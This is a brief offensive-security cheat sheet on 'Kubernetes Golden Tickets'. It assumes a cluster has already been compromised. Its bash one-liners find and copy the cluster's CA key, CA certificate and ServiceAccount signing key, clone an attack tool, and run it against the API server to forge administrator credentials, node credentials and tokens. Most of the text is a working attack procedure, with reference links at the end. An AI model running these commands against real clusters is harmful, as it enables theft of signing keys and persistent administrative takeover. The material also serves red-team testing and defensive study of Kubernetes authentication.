Kubernetes Golden Tickets

Kubernetes Golden Tickets allow attackers to forge Kubernetes administrative user certificates, node certificates, and ServiceAccount tokens.

Scripted solution

The following is a few bash oneliners to operationalize k8s spoofilizer. Assumptions made in this are:

• You’ve compromised a non-cloud provider managed Kubernetes cluster
• You have access to (typically in /etc/kubernetes/pki/, In minikube it’s /var/lib/minikube/certs):
  • ca.crt: The public certificate of the cluster’s Certificate Authority
  • ca.key: Used to sign and issue new certificates within the Kubernetes cluster.
  • sa.key: Private key used to sign Service Account tokens.

# Search for these files
# Run this on the control plane node
find / -name "ca.crt" ; find / -name "sa.key" ; find / -name "ca.key" 

# If everything is in /etc/kubernetes/pki...
# Move them to key_dir
mkdir key_dir ; cp /etc/kubernetes/pki/ca.crt /etc/kubernetes/pki/sa.key /etc/kubernetes/pki/ca.key key_dir/

# Install pre-reqs
# Note you should probably use a virtual env for this...
sudo apt update && sudo apt install python3 python3-pip -y ; git clone https://github.com/jtesta/k8s_spoofilizer; pip install --user cryptography #--break-system-packages 

# Set APISERVER to the IP of the API server
APISERVER=$(kubectl get pods -A  -o wide | grep kube-api | awk '{print $7}') && echo $APISERVER

# Run k8s_spoofilizer.py
cd k8s_spoofilizer; ./k8s_spoofilizer.py --server https://$APISERVER:6443/ --update-uid-cache ../key_dir/

References

• https://www.positronsecurity.com/blog/2025-02-26-kubernetes-golden-tickets/
• https://github.com/jtesta/k8s_spoofilizer
• https://thegreycorner.com/2023/11/15/kubernetes-auth-deep-dive.html
• https://raesene.github.io/blog/2022/12/21/Kubernetes-persistence-with-Tocan-and-Teisteanas/
• https://github.com/raesene/teisteanas
• https://raesene.github.io/blog/2019/04/16/kubernetes-certificate-auth-golden-key/